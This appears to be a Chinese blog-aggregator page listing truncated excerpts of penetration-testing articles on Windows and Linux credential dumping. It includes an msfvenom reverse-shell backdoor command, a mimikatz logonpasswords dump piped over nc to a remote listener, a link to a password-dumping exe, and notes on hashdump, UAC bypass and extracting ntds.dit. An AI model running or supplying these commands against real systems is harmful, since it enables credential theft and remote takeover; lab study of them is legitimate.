实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO ...
分类:
其他好文 时间:
2019-09-01 01:45:56
阅读次数:
183
mimikatz需要管理员权限运行 vps监听 nc -lvp 4444 服务器管理员权限执行 mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.0.1 1234 ...
分类:
其他好文 时间:
2019-08-11 00:45:38
阅读次数:
78
无需任何参数,运行EXE即可自动读取Windows系统密码 EXE版需要其它功能请使用原版 (参数已写死仅读密码) 结果保存于当前目录mz.log EXE https://github.com/k8gege/K8tools/blob/master/mz.exe https://github.com/ ...
分类:
系统相关 时间:
2019-05-15 00:38:57
阅读次数:
332
0x01 前言 很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。 在meterpreter shell命令切到交互式cmd命令。 0x02 过程 reg save 方式使得需要下载的目标机 Ps:reg save将指定子项、项的注册表值的副本保存到指定 ...
分类:
其他好文 时间:
2019-04-20 21:36:45
阅读次数:
353
使用hashdump抓取密码(需要系统管理权限) 另外一个更强大的模块 smart_hashdump 如果目标是win7 就需要先绕过UAC 还可以使用msf内置的mimikatz抓取hash msv kerberos 抓取系统票据 wdigest 获取系统账户信息 mimikatz_command ...
分类:
其他好文 时间:
2019-03-11 13:07:53
阅读次数:
276
1、注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。 本地获取 2、lsass.exe提取 3、ntds.dit提取 ...
分类:
其他好文 时间:
2019-02-28 15:12:10
阅读次数:
215
简介 Mimikatz是法国人Gentil Kiwi写的一款windows平台下的轻量级调试器,于2014年4月发起。它的功能非常强大,支持从windows进程lsass.exe 里猎取windows处于active状态账号明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-has ...
分类:
其他好文 时间:
2019-01-02 23:28:32
阅读次数:
269
0x00 标准模块 Module : standardFull name : Standard moduleDescription : Basic commands (does not require module name) exit - Quit mimikatz cls - Clear scr ...
分类:
其他好文 时间:
2018-11-03 14:02:50
阅读次数:
190
最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题: ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDiges ...
分类:
系统相关 时间:
2018-11-03 11:24:26
阅读次数:
242
前有Mimikatz,今有mimipenguin,近日国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,可以说弥补了Linux下密码抓取的空缺。 详情通过转储过程和提取那些包含明文密码可能性很高的行(hang),充分利用内存中的明文凭证。通过检查 ...
分类:
其他好文 时间:
2018-08-24 23:36:03
阅读次数:
220